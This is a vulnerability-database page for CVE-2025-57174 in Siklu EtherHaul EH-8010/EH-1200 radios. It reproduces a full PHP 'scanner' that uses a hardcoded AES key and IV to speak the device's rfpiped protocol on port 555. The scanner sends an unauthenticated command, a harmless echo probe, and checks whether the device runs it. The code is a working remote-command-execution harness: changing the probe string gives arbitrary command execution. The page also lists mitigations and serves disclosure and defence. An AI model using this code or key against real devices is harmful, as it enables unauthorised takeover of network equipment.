Vulners
Lucene search
📄 Siklu EtherHaul EH-8010 / EH-1200 Vulnerability Scanner
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | CVE-2025-57174 | 24 Sep 202522:15 | – | circl |
 | Ceragon EtherHaul series 操作系统命令注入漏洞 | 15 Sep 202500:00 | – | cnnvd |
 | CVE-2025-57174 | 15 Sep 202500:00 | – | cve |
 | CVE-2025-57174 | 15 Sep 202500:00 | – | cvelist |
 | Siklu EtherHaul Series EH-8010 - Remote Command Execution | 17 Jan 202600:00 | – | exploitdb |
 | EUVD-2025-29202 | 3 Oct 202520:07 | – | euvd |
 | CVE-2025-57174 | 15 Sep 202517:15 | – | nvd |
 | 📄 Siklu EtherHaul Series EH-8010 / EH-1200 Remote Command Execution | 20 Jan 202600:00 | – | packetstorm |
 | PT-2025-37368 | 13 Sep 202500:00 | – | ptsecurity |
 | CVE-2025-57174 | 17 Sep 202500:49 | – | redhatcve |
10
=============================================================================================================================================
| # Title : Siklu EtherHaul EH-8010 / EH-1200 Vulnerability Scanner |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.ceragon.com/products/siklu-by-ceragon |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/214068/ & CVE-2025-57174
[+] Summary : This PHP-based scanner safely detects an unauthenticated remote command execution vulnerability in Siklu EtherHaul devices by
sending a non-destructive encrypted probe command and validating the response.
The scanner does not alter device state and is suitable for large-scale assessments.
[+] Impact:
Successful detection confirms full unauthenticated RCE exposure.
[+] Mitigation:
- Restrict TCP port 555
- Disable rfpiped service
- Update firmware
[+] POC: php poc.php 192.168.1.10
<?php
define('PORT', 555);
define('HDR_LEN', 0x90);
$IV0 = pack(
'V4',
0xEA703B82,
0x75A9A17B,
0x1DFC7BB9,
0x55A24D72
);
$KEY = hex2bin(
'89e7ffbeeb2d73f5a910fc425b1f3617' .
'9fb95e7535a342a05d0248b119d24b82'
);
function recv_exact($sock, $len)
{
$data = '';
while (strlen($data) < $len) {
$chunk = @socket_read($sock, $len - strlen($data));
if ($chunk === false || $chunk === '') {
return false;
}
$data .= $chunk;
}
return $data;
}
function pad16_zero($data)
{
$r = strlen($data) % 16;
return $r === 0 ? $data : $data . str_repeat("\x00", 16 - $r);
}
function hdr_checksum($hdr)
{
$sum = 0;
for ($i = 0; $i < 0x0C; $i++) {
$sum += ord($hdr[$i]);
}
for ($i = 0x10; $i < HDR_LEN; $i++) {
$sum += ord($hdr[$i]);
}
return $sum & 0xFFFFFFFF;
}
function build_header($flag, $msg, $payload_len)
{
$hdr = str_repeat("\x00", HDR_LEN);
$hdr[0] = chr($flag);
$hdr[1] = chr($msg);
$hdr = substr_replace($hdr, pack('V', $payload_len), 0x08, 4);
$hdr = substr_replace($hdr, pack('V', hdr_checksum($hdr)), 0x0C, 4);
return $hdr;
}
class RFPipeSession
{
public $key;
public $send_iv;
public $recv_iv;
function __construct($key, $iv)
{
$this->key = $key;
$this->send_iv = $iv;
$this->recv_iv = $iv;
}
function enc_send($sock, $data)
{
$ct = openssl_encrypt(
$data,
'AES-256-CBC',
$this->key,
OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING,
$this->send_iv
);
$this->send_iv = substr($ct, -16);
@socket_write($sock, $ct);
}
function recv_header($sock)
{
$ct = recv_exact($sock, HDR_LEN);
if ($ct === false) return false;
$pt = openssl_decrypt(
$ct,
'AES-256-CBC',
$this->key,
OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING,
$this->recv_iv
);
$this->recv_iv = substr($ct, -16);
return $pt;
}
function dec_recv($sock, $len)
{
$padded = ($len + 15) & ~15;
$ct = recv_exact($sock, $padded);
if ($ct === false) return false;
$pt = openssl_decrypt(
$ct,
'AES-256-CBC',
$this->key,
OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING,
$this->recv_iv
);
$this->recv_iv = substr($ct, -16);
return substr($pt, 0, $len);
}
}
if ($argc < 2) {
echo "Usage: php siklu_eh_scanner.php <target>\n";
exit;
}
$target = $argv[1];
$probe = "echo VULN_CHECK\x00";
$sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (!@socket_connect($sock, $target, PORT)) {
echo "[!] Connection failed\n";
exit;
}
$sess = new RFPipeSession($KEY, $IV0);
$hdr = build_header(0x00, 0x01, strlen($probe));
$sess->enc_send($sock, $hdr);
$sess->enc_send($sock, pad16_zero($probe));
$resp_hdr = $sess->recv_header($sock);
if ($resp_hdr === false) {
echo "[?] No response (filtered or patched)\n";
exit;
}
$len = unpack('V', substr($resp_hdr, 0x08, 4))[1];
if ($len <= 0) {
echo "[-] Not Vulnerable\n";
exit;
}
$data = $sess->dec_recv($sock, $len);
if ($data !== false && strpos($data, 'VULN_CHECK') !== false) {
echo "[+] VULNERABLE: Unauthenticated RCE detected\n";
} else {
echo "[-] Not Vulnerable\n";
}
socket_close($sock);
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Jan 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.19.8
EPSS0.01691
SSVC